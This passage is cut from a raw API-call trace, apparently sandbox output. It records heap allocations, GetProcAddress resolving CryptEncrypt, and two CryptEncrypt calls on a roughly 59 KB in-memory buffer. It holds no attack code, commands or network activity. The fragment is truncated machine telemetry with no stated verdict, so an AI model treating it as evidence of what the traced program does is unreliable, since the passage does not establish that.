dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0185.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50a10 [0185.387] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0185.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0185.387] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0185.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54198 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0185.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0185.388] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xe879, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xe880) returned 1 [0185.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0185.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0185.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0185.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0185.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0185.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0185.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0185.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0185.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0185.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0185.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.392] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0185.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.392] CharLowerBuffW (in: lpsz="byte[59520]", cchLength=0xb | out: lpsz="byte[59520]") returned 0xb [0185.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0185.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0185.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0185.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0185.395] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0185.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0185.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0185.396] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0185.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.396] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0185.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0185.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0185.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0185.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0185.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0185.397] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0185.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bfd158 | out: hHeap=0x970000) returned 1 [0185.398] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0185.399] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0185.399] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0185.399] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0185.401] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0185.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0185.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a70, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0185.402] CryptEncrypt (in: hKey=0xa87550, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bee8d0*, pdwDataLen=0x8cef60*=0xe879, dwBufLen=0xe880 | out: pbData=0x3bee8d0*, pdwDataLen=0x8cef60*=0xe880) returned 1 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0185.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.404] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0185.404] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0185.405] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0185.405] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 